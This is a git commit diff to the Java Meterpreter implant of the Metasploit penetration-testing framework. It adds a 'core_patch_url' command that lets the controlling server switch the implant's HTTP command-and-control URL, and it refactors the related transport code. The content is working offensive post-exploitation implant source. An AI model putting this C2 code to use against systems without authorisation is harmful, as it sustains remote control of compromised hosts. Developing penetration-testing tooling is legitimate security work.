add core_patch_url, fix android stageless http

2025-02-28 06:13:03 +01:00 · 2016-09-14 15:27:13 +01:00 · 2016-09-14 15:27:13 +01:00 · c95ada0d87
commit c95ada0d87
parent 8154ae317d
5 changed files with 38 additions and 10 deletions
--- a/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/HttpTransport.java
+++ b/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/HttpTransport.java
@ -142,6 +142,9 @@ public class HttpTransport extends Transport {
            // is the situation that happens on initial connect (not reconnect)
            TLVPacket response = request.createResponse();
            int result = met.getCommandManager().executeCommand(met, request, response);
+            if (result == Command.EXIT_DISPATCH) {
+                return true;
+            }
            this.writePacket(response, TLVPacket.PACKET_TYPE_RESPONSE);

            return true;
@ -209,6 +212,7 @@ public class HttpTransport extends Transport {
        while (!met.hasSessionExpired() &&
            System.currentTimeMillis() < lastPacket + this.commTimeout) {
            try {
+                useNextUrl();
                TLVPacket request = this.readPacket();

                if (request != null) {
@ -237,21 +241,21 @@ public class HttpTransport extends Transport {
                break;
            }

-            // see if we switched URLs along the way, and if we did, move it on over.
-            // This is really only used for stageless payloads (not yet implemented in
-            // msf for this, but we're getting there). The command for this hasn't yet
-            // been wired in.
-            if (this.nextUrl != null) {
-                this.url = this.nextUrl.toString();
-                this.targetUrl = this.nextUrl;
-                this.nextUrl = null;
-            }
        }

        // if we get here we assume things aren't good.
        return false;
    }

+    private void useNextUrl() {
+        // see if we switched URLs along the way, and if we did, move it on over.
+        if (this.nextUrl != null) {
+            this.url = this.nextUrl.toString();
+            this.targetUrl = this.nextUrl;
+            this.nextUrl = null;
+        }
+    }
+
    private URLConnection createConnection() {
        URLConnection conn = null;

--- a/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/TLVPacket.java
+++ b/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/TLVPacket.java
@ -270,7 +270,7 @@ public class TLVPacket {
    public TLVPacket createResponse() throws IOException {
        TLVPacket response = new TLVPacket();
        response.add(TLVType.TLV_TYPE_METHOD, this.getStringValue(TLVType.TLV_TYPE_METHOD));
-        response.add(TLVType.TLV_TYPE_REQUEST_ID, this.getStringValue(TLVType.TLV_TYPE_REQUEST_ID));
+        response.add(TLVType.TLV_TYPE_REQUEST_ID, this.getStringValue(TLVType.TLV_TYPE_REQUEST_ID, null));
        return response;
    }

--- a/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/Utils.java
+++ b/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/Utils.java
@ -9,6 +9,11 @@ import java.net.UnknownHostException;

 public class Utils {

+    public static void log(String log) {
+        StackTraceElement stack = new Throwable().getStackTrace()[1];
+        System.err.println("" + stack.getFileName() + ":" + stack.getLineNumber() + "=" + log);
+    }
+
    public static String runCommand(String command) throws IOException {
        Process process = Runtime.getRuntime().exec(command);
        BufferedReader br = new BufferedReader(new InputStreamReader(process.getInputStream()));
--- a/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/core/Loader.java
+++ b/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/core/Loader.java
@ -21,6 +21,7 @@ public class Loader implements ExtensionLoader {
        mgr.registerCommand("core_loadlib", core_loadlib.class);
        mgr.registerCommand("core_uuid", core_uuid.class);
        mgr.registerCommand("core_machine_id", core_machine_id.class);
+        mgr.registerCommand("core_patch_url", core_patch_url.class);
        mgr.registerCommand("core_shutdown", core_shutdown.class);
        mgr.registerCommand("core_transport_set_timeouts", core_transport_set_timeouts.class);
        mgr.registerCommand("core_transport_list", core_transport_list.class);
--- a/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/core/core_patch_url.java
+++ b/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/core/core_patch_url.java
@ -0,0 +1,18 @@
+package com.metasploit.meterpreter.core;
+
+import com.metasploit.meterpreter.Meterpreter;
+import com.metasploit.meterpreter.TLVPacket;
+import com.metasploit.meterpreter.TLVType;
+import com.metasploit.meterpreter.command.Command;
+
+public class core_patch_url implements Command {
+
+    public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
+        String patchUrl = request.getStringValue(TLVType.TLV_TYPE_TRANS_URL);
+        if (meterpreter.getTransports().current().switchUri(patchUrl)) {
+            return EXIT_DISPATCH;
+        } else {
+            return ERROR_FAILURE;
+        }
+    }
+}